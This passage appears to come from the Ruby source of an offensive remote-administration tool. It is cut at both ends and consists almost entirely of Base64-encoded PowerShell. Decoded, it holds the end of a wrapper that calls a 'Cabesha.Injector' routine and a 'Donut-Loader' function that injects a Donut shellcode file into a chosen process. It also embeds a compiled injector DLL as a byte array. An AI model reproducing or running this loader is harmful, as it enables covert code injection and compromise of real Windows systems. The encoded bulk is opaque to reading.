sIDk5LCA5NywgOTgsIDEwMSwgMTE1LCAxMDQsIDk3LCA5MiwgMTExLCA5OCwgMTA2LCA5MiwgNjgsIDEwMSwgOTgsIDExNywgMTAzLCA5MiwgOTksIDk3LCA5OCwgMTAxLCAxMTUsIDEwNCwgOTcsIDQ2LCAxMTIsIDEwMCwgOTgsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDUyLCA0MSwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgNzgsIDQxLCAwLCAwLCAwLCAzMiwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgNjQsIDQxLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCA5NSwgNjcsIDExMSwgMTE0LCA2OCwgMTA4LCAxMDgsIDc3LCA5NywgMTA1LCAxMTAsIDAsIDEwOSwgMTE1LCA5OSwgMTExLCAxMTQsIDEwMSwgMTAxLCA0NiwgMTAwLCAxMDgsIDEwOCwgMCwgMCwgMCwgMCwgMCwgMjU1LCAzNywgMCwgMzIsIDAsIDE2LCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAxLCAwLCAxNiwgMCwgMCwgMCwgMjQsIDAsIDAsIDEyOCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMSwgMCwgMSwgMCwgMCwgMCwgNDgsIDAsIDAsIDEyOCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMSwgMCwgMCwgMCwgMCwgMCwgNzIsIDAsIDAsIDAsIDg4LCA2NCwgMCwgMCwgMjA0LCAyLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAyMDQsIDIsIDUyLCAwLCAwLCAwLCA4NiwgMCwgODMsIDAsIDk1LCAwLCA4NiwgMCwgNjksIDAsIDgyLCAwLCA4MywgMCwgNzMsIDAsIDc5LCAwLCA3OCwgMCwgOTUsIDAsIDczLCAwLCA3OCwgMCwgNzAsIDAsIDc5LCAwLCAwLCAwLCAwLCAwLCAxODksIDQsIDIzOSwgMjU0LCAwLCAwLCAxLCAwLCAwLCAwLCAxLCAwLCAxMzAsIDcyLCAxNzEsIDI3LCAwLCAwLCAxLCAwLCAxMzAsIDcyLCAxNzEsIDI3LCA2MywgMCwgMCwgMCwgMCwgMCwgMCwgMCwgNCwgMCwgMCwgMCwgMiwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgNjgsIDAsIDAsIDAsIDEsIDAsIDg2LCAwLCA5NywgMCwgMTE0LCAwLCA3MCwgMCwgMTA1LCAwLCAxMDgsIDAsIDEwMSwgMCwgNzMsIDAsIDExMCwgMCwgMTAyLCAwLCAxMTEsIDAsIDAsIDAsIDAsIDAsIDM2LCAwLCA0LCAwLCAwLCAwLCA4NCwgMCwgMTE0LCAwLCA5NywgMCwgMTEwLCAwLCAxMTUsIDAsIDEwOCwgMCwgOTcsIDAsIDExNiwgMCwgMTA1LCAwLCAxMTEsIDAsIDExMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMTc2LCA0LCA0NCwgMiwgMCwgMCwgMSwgMCwgODMsIDAsIDExNiwgMCwgMTE0LCAwLCAxMDUsIDAsIDExMCwgMCwgMTAzLCAwLCA3MCwgMCwgMTA1LCAwLCAxMDgsIDAsIDEwMSwgMCwgNzMsIDAsIDExMCwgMCwgMTAyLCAwLCAxMTEsIDAsIDAsIDAsIDgsIDIsIDAsIDAsIDEsIDAsIDQ4LCAwLCA0OCwgMCwgNDgsIDAsIDQ4LCAwLCA0OCwgMCwgNTIsIDAsIDk4LCAwLCA0OCwgMCwgMCwgMCwgNTYsIDAsIDgsIDAsIDEsIDAsIDcwLCAwLCAxMDUsIDAsIDEwOCwgMCwgMTAxLCAwLCA2OCwgMCwgMTAxLCAwLCAxMTUsIDAsIDk5LCAwLCAxMTQsIDAsIDEwNSwgMCwgMTEyLCAwLCAxMTYsIDAsIDEwNSwgMCwgMTExLCAwLCAxMTAsIDAsIDAsIDAsIDAsIDAsIDk5LCAwLCA5NywgMCwgOTgsIDAsIDEwMSwgMCwgMTE1LCAwLCAxMDQsIDAsIDk3LCAwLCAwLCAwLCA2NCwgMCwgMTUsIDAsIDEsIDAsIDcwLCAwLCAxMDUsIDAsIDEwOCwgMCwgMTAxLCAwLCA4NiwgMCwgMTAxLCAwLCAxMTQsIDAsIDExNSwgMCwgMTA1LCAwLCAxMTEsIDAsIDExMCwgMCwgMCwgMCwgMCwgMCwgNDksIDAsIDQ2LCAwLCA0OCwgMCwgNDYsIDAsIDU1LCAwLCA0OCwgMCwgNTYsIDAsIDUxLCAwLCA0NiwgMCwgNDksIDAsIDU2LCAwLCA1MywgMCwgNTQsIDAsIDUwLCAwLCAwLCAwLCAwLCAwLCA1NiwgMCwgMTIsIDAsIDEsIDAsIDczLCAwLCAxMTAsIDAsIDExNiwgMCwgMTAxLCAwLCAxMTQsIDAsIDExMCwgMCwgOTcsIDAsIDEwOCwgMCwgNzgsIDAsIDk3LCAwLCAxMDksIDAsIDEwMSwgMCwgMCwgMCwgOTksIDAsIDk3LCAwLCA5OCwgMCwgMTAxLCAwLCAxMTUsIDAsIDEwNCwgMCwgOTcsIDAsIDQ2LCAwLCAxMDAsIDAsIDEwOCwgMCwgMTA4LCAwLCAwLCAwLCA2OCwgMCwgMTUsIDAsIDEsIDAsIDc2LCAwLCAxMDEsIDAsIDEwMywgMCwgOTcsIDAsIDEwOCwgMCwgNjcsIDAsIDExMSwgMCwgMTEyLCAwLCAxMjEsIDAsIDExNCwgMCwgMTA1LCAwLCAxMDMsIDAsIDEwNCwgMCwgMTE2LCAwLCAwLCAwLCA2NywgMCwgMTExLCAwLCAxMTIsIDAsIDEyMSwgMCwgMTE0LCAwLCAxMDUsIDAsIDEwMywgMCwgMTA0LCAwLCAxMTYsIDAsIDMyLCAwLCA1MCwgMCwgNDgsIDAsIDQ5LCAwLCA1NywgMCwgMCwgMCwgMCwgMCwgNjQsIDAsIDEyLCAwLCAxLCAwLCA3OSwgMCwgMTE0LCAwLCAxMDUsIDAsIDEwMywgMCwgMTA1LCAwLCAxMTAsIDAsIDk3LCAwLCAxMDgsIDAsIDcwLCAwLCAxMDUsIDAsIDEwOCwgMCwgMTAxLCAwLCAxMTAsIDAsIDk3LCAwLCAxMDksIDAsIDEwMSwgMCwgMCwgMCwgOTksIDAsIDk3LCAwLCA5OCwgMCwgMTAxLCAwLCAxMTUsIDAsIDEwNCwgMCwgOTcsIDAsIDQ2LCAwLCAxMDAsIDAsIDEwOCwgMCwgMTA4LCAwLCAwLCAwLCA0OCwgMCwgOCwgMCwgMSwgMCwgODAsIDAsIDExNCwgMCwgMTExLCAwLCAxMDAsIDAsIDExNywgMCwgOTksIDAsIDExNiwgMCwgNzgsIDAsIDk3LCAwLCAxMDksIDAsIDEwMSwgMCwgMCwgMCwgMCwgMCwgOTksIDAsIDk3LCAwLCA5OCwgMCwgMTAxLCAwLCAxMTUsIDAsIDEwNCwgMCwgOTcsIDAsIDAsIDAsIDY4LCAwLCAxNSwgMCwgMSwgMCwgODAsIDAsIDExNCwgMCwgMTExLCAwLCAxMDAsIDAsIDExNywgMCwgOTksIDAsIDExNiwgMCwgODYsIDAsIDEwMSwgMCwgMTE0LCAwLCAxMTUsIDAsIDEwNSwgMCwgMTExLCAwLCAxMTAsIDAsIDAsIDAsIDQ5LCAwLCA0NiwgMCwgNDgsIDAsIDQ2LCAwLCA1NSwgMCwgNDgsIDAsIDU2LCAwLCA1MSwgMCwgNDYsIDAsIDQ5LCAwLCA1NiwgMCwgNTMsIDAsIDU0LCAwLCA1MCwgMCwgMCwgMCwgMCwgMCwgNzIsIDAsIDE1LCAwLCAxLCAwLCA2NSwgMCwgMTE1LCAwLCAxMTUsIDAsIDEwMSwgMCwgMTA5LCAwLCA5OCwgMCwgMTA4LCAwLCAxMjEsIDAsIDMyLCAwLCA4NiwgMCwgMTAxLCAwLCAxMTQsIDAsIDExNSwgMCwgMTA1LCAwLCAxMTEsIDAsIDExMCwgMCwgMCwgMCwgNDksIDAsIDQ2LCAwLCA0OCwgMCwgNDYsIDAsIDU1LCAwLCA0OCwgMCwgNTYsIDAsIDUxLCAwLCA0NiwgMCwgNDksIDAsIDU2LCAwLCA1MywgMCwgNTQsIDAsIDUwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAzMiwgMCwgMCwgMTIsIDAsIDAsIDAsIDk2LCA1NywgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCkpIHwgb3V0LW51bGwgCiRiaW5hcmlvICA9ICRhcmcuc3BsaXQoIiAsIilbMF0KJGFyZyA9ICRhcmcuUmVwbGFjZSgiJGJpbmFyaW8gIiwiIikuc3BsaXQoIiwiKSB8IFNlbGVjdC1PYmplY3QgLVNraXAgMQokYXJndW1lbnRvcyA9ICRiaW5hcmlvCmZvcmVhY2ggKCRhcmd1bWVudG8gaW4gJGFyZykgewpbYXJyYXldJGFyZ3VtZW50b3MgKz0gJGFyZ3VtZW50bwoKfQpbQ2FiZXNoYS5JbmplY3Rvcl06OkV4ZWN1dGUoJGFyZ3VtZW50b3MpfQp9') 1123 | donuts = Base64.decode64('ZnVuY3Rpb24gRG9udXQtTG9hZGVyIHtwYXJhbSgkcHJvY2Vzc19pZCwkZG9udXRmaWxlKQogICAgJGhlbHA9QCIKLlNZTk9QU0lTCiAgICBEb251dCBMb2FkZXIuCiAgICBQb3dlclNoZWxsIEZ1bmN0aW9uOiBEb251dC1Mb2FkZXIKICAgIEF1dGhvcjogTHVpcyBWYWNhcyAoQ3liZXJWYWNhKQogICAgQmFzZWQgY29kZTogVGhlV292ZXIKCiAgICBSZXF1aXJlZCBkZXBlbmRlbmNpZXM6IE5vbmUKICAgIE9wdGlvbmFsIGRlcGVuZGVuY2llczogTm9uZQouREVTQ1JJUFRJT04KICAgIAouRVhBTVBMRQogICAgRG9udXQtTG9hZGVyIC1wcm9jZXNzX2lkIDIxOTUgLWRvbnV0ZmlsZSAvaG9tZS9jeWJlcnZhY2EvZG9udXQuYmluCiAgICBEb251dC1Mb2FkZXIgLXByb2Nlc3NfaWQgKGdldC1wcm9jZXNzIG5vdGVwYWQpLmlkIC1kb251dGZpbGUgL2hvbWUvY3liZXJ2YWNhL2RvbnV0LmJpbgoKICAgIERlc2NyaXB0aW9uCiAgICAtLS0tLS0tLS0tLQogICAgRnVuY3Rpb24gdGhhdCBsb2FkcyBhbiBhcmJpdHJhcnkgZG9udXQgOkQKIkAKaWYgKCRwcm9jZXNzX2lkIC1lcSAkbnVsbCAtb3IgJGRvbnV0ZmlsZSAtZXEgJG51bGwpIHt3cml0ZS1ob3N0ICIkaGVscGBuIn0gZWxzZSAKewppZiAoKFtJbnRQdHJdOjpTaXplKSAtZXEgNCkge3dyaXRlLWhvc3QgIlNvcnJ5LCB0aGlzIGZ1bmN0aW9uIG9ubHkgd29yayBvbiB4NjQgOigiOyBicmVha30KW2J5dGVbXV0kYnl0ZXMgPSA3NywgOTAsIDE0NCwgMCwgMywgMCwgMCwgMCwgNCwgMCwgMCwgMCwgMjU1LCAyNTUsIDAsIDAsIDE4NCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgNjQsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDEyOCwgMCwgMCwgMCwgMTQsIDMxLCAxODYsIDE0LCAwLCAxODAsIDksIDIwNSwgMzMsIDE4NCwgMSwgNzYsIDIwNSwgMzMsIDg0LCAxMDQsIDEwNSwgMTE1LCAzMiwgMTEyLCAxMTQsIDExMSwgMTAzLCAxMTQsIDk3LCAxMDksIDMyLCA5OSwgOTcsIDExMCwgMTEwLCAxMTEsIDExNiwgMzIsIDk4LCAxMDEsIDMyLCAxMTQsIDExNywgMTEwLCAzMiwgMTA1LCAxMTAsIDMyLCA2OCwgNzksIDgzLCAzMiwgMTA5LCAxMTEsIDEwMCwgMTAxLCA0NiwgMTMsIDEzLCAxMCwgMzYsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDgwLCA2OSwgMCwgMCwgMTAwLCAxMzQsIDIsIDAsIDQxLCA2NCwgMTM5LCA5MywgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMjQwLCAwLCAzNCwgMzIsIDExLCAyLCAxMSwgMCwgMCwgMTYsIDAsIDAsIDAsIDE2LCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAzMiwgMCwgMCwgMCwgMCwgNjQsIDAsIDAsIDAsIDAsIDAsIDAsIDMyLCAwLCAwLCAwLCAxNiwgMCwgMCwgNCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgNiwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgOTYsIDAsIDAsIDAsIDE2LCAwLCAwLCAwLCAwLCAwLCAwLCAzLCAwLCA5NiwgMTMzLCAwLCAwLCA2NCwgMCwgMCwgMCwgMCwgMCwgMCwgNjQsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDE2LCAwLCAwLCAwLCAwLCAwLCAwLCAzMiwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMTYsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDY0LCAwLCAwLCA4OCwgMywgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMjAsIDQ1LCAwLCAwLCAyOCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMzIsIDAsIDAsIDcyLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCA0NiwgMTE2LCAxMDEsIDEyMCwgMTE2LCAwLCAwLCAwLCA3NiwgMTQsIDAsIDAsIDAsIDMyLCAwLCAwLCAwLCAxNiwgMCwgMCwgMCwgMTYsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDMyLCAwLCAwLCA5NiwgNDYsIDExNCwgMTE1LCAxMTQsIDk5LCAwLCAwLCAwLCA4OCwgMywgMCwgMCwgMCwgNjQsIDAsIDAsIDAsIDE2LCAwLCAwLCAwLCAzMiwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgNjQsIDAsIDAsIDY0LCA0NiwgMTE0LCAxMDEsIDEwOCwgMTExLCA5OSwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgOTYsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDQ4LCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCA2NCwgMCwgMCwgNjYsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDA